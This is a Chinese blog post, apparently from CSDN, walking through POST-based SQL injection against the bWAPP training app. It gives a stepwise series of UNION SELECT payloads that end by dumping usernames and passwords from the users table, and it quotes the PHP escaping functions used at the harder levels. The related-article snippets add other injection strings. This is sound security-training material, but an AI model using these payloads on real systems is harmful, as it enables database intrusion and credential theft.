bWAPP-SQLInjectionPost1

最新推荐文章于 2023-02-28 09:44:03 发布
最新推荐文章于 2023-02-28 09:44:03 发布
阅读量161 收藏
点赞数
分类专栏: bWAPP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/108697603
版权

POST 字符型注入

判断是否存在注入

'
' and 1=1 #
' and 1=2 #

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

判断注入字段个数

' order by 7 #
' order by 8 #

在这里插入图片描述
在这里插入图片描述

判断注入字段位置

' union select 1,2,3,4,5,6,7 limit 10,1#

在这里插入图片描述

获取数据库信息

' union select 1,database(),version(),4,5,6,7 limit 10,1#

在这里插入图片描述

获取表名

' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),version(),4,5,6,7 limit 10,1#

在这里插入图片描述

获取列名

' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema=database()),version(),4,5,6,7 limit 10,1#

在这里插入图片描述

获取信息

' union select 1,(select group_concat(login,'-',password,'-') from users),version(),4,5,6,7 limit 10,1#

在这里插入图片描述

演练

low

' union select 1,(select group_concat(login,'-',password,'-') from users),version(),4,5,6,7 limit 10,1#

mid

不大可能绕过

function sqli_check_1($data)
{
   
    return addslashes($data);
    // 语法 addslashes ( string $str ) : string
    // 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。
    // 这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。
}

high

无法绕过

function sqli_check_2($data)
{
   
    return mysql_real_escape_string($data);
    // 面向对象风格
    // mysqli::escape_string ( string $escapestr ) : string
    // mysqli::real_escape_string ( string $escapestr ) : string
    
    // 过程化风格
    // mysqli_real_escape_string ( mysqli $link , string $escapestr ) : string
    // 此函数用来对字符串中的特殊字符进行转义, 以使得这个字符串是一个合法的 SQL 语句。
    // 传入的字符串会根据当前连接的字符集进行转义,得到一个编码后的合法的 SQL 语句。
}
hee_mee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全入门篇:bwapp靶场通关(更新ing)
weicanglv3545的博客
08-12 2953
bwapp是一个覆盖范围非常广的漏洞靶场,非常适合初学者入门使用。 本篇文章中使用的bwapp是docker安装,因此有一些漏洞不能很好的支持。 如果想获得完整体验,可下载bee-box,一个预装了bwapp的Linux VM。...
BWAPP之SQL注入通关
qq_43665434的博客
04-17 2761
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
sql注入靶场安装/POST型注入基础/一看就会
ChenD的学习笔记
10-05 800
SQL注入(二)post型注入方法
bWAPP SQL注入篇
angry_program的博客
03-03 6792
步骤 下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数 (order by ) 3.确定显示的字段顺序 4.获取当前数据库 (爆库) 5.获取数据库中的表 (爆表) 6.获取表中的字段名 (爆字段) 7.下载数据 (爆数据) 0x01SQL Injection (GET/Search) ...
3.bWAPP SQL注入篇
自强不息
01-23 2821
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
BWAPPsql注入部分详解
最新发布
tianzhende_kun的博客
02-28 806
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
bWAPP漏洞测试环境.rar
04-06
1. **Web应用漏洞测试基础**: 在网络安全领域,Web应用漏洞测试是确保网站安全性的重要环节。它包括识别和修复代码中的安全漏洞,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。bWAPP提供了这些漏洞的模拟...
bwapp官方最新版本
03-20
1. **bWAPP_intro.pdf**:这很可能是bwapp的介绍文档,详细阐述了bwapp的背景、功能、设计理念以及如何使用这个平台。用户可以通过阅读此文档来了解bwapp的基本信息和应用场景。 2. **README.txt**:这是一个标准的...
bWAPP源码docker安装.zip
08-12
bwapp源码,下载该源码,然后通过docker在本地进行安装,也可以直接在网上拉取镜像。bwapp源码,下载该源码,然后通过docker在本地进行安装,也可以直接在网上拉取镜像。
E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索.pdf
12-02
1. **网络环境准备**: - 启动虚拟机:在Kali Linux和Linux系统中,通过网络拓扑管理工具启动渗透机和靶机。 - IP地址获取与连通性测试:使用`ifconfig`或`ipconfig`命令获取IP地址,并用`ping`命令测试网络可达性...
SQL Injection (POST/Select)
qq_40554015的博客
09-17 255
这道题显然还是用burpsuit抓包来看看: movie=2 和上一题不同,这里是数字,猜测换成其他数字就是其他电影,那么怎么换呢? burpsuit抓包后右键发送到Repeater,修改数据再发送就可以了! 修改为3,果然变成了Man of Steel 那就直接在左边修改数据post就可以了 先来看看可显示位: 和前几题真是一模一样! 再来看看库名: 接下来是表名: 然后是字段名: 最后看一看login和pass...
sql group by和over一起使用_Web安全(二)SQL注入[二]
weixin_39965102的博客
12-09 200
点击上方蓝字关注!注:本篇文章为个人学习笔记仅供学习交流。POSTSQL注入在HTTP常用方法中,POST方法提交的信息不存储与URL,而是存储在HTTP实体内容中,在大多的提交过程,用户是无感知的。且注入信息是存储于HTTP实体内容中而不是URL,通过改造实体内容,达到实际执行的SQL语句获取更多信息的目的。示例1.开启bwapp漏洞环境,如下图选择SQL injection(POS...
sql注入练习记录
weixin_46158939的博客
12-04 357
sql注入入门练习;bwapp,dvwa
bWAPP-SQLInjectionPost2
hee_mee的博客
09-20 119
zeronil
bWAPP----SQL Injection (GET/Search)
weixin_30477293的博客
07-23 567
SQL Injection (GET/Search) 输入单引号 报错,在%'附近出错,猜测参数被 '% %'这种形式包裹,没有任何过滤,直接带入了数据库查询 输入order by查询列 union select 确定显示位 然后分别查询用户,数据库名,数据库版本 根据数据库版本知道可以通过information_schema表查询信息,查询table...
bwapp 随笔
freshfox的博客
08-11 2116
SQL Injection (GET/Search) C:\Python27\sqlmap>python sqlmap.py  -u  "http://localhost/bwapp/sqli_1.php?titl e=sfsdf&action=search"  --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c84;security_
sql_injectionpost注入
aipei5098的博客
04-14 268
1、代码篇 </html> <center> <form action="#" method="post"> 姓名:<input type="text" name="user"><br> 密码:<input type="text" name="pass"><br> <input ty...
bWAPP练习--injectionSQL Injection (GET/Search)
weixin_38167363的博客
04-09 996
SQL注入: SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 LOW: 0x01:分析一下网站的...
bWAPP V2.2:入门教程:搭建与准备虚拟机
第1课的核心内容是关于如何下载和准备bWAPP虚拟机。bWAPP V2.2 是bWAPP系列的最新版本,它集合了多个操作系统环境,包括BackTrack(现在被称为Kali Linux)、CentOS、Fedora、卡利1.0、Ubuntu等,以及常见的安全工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值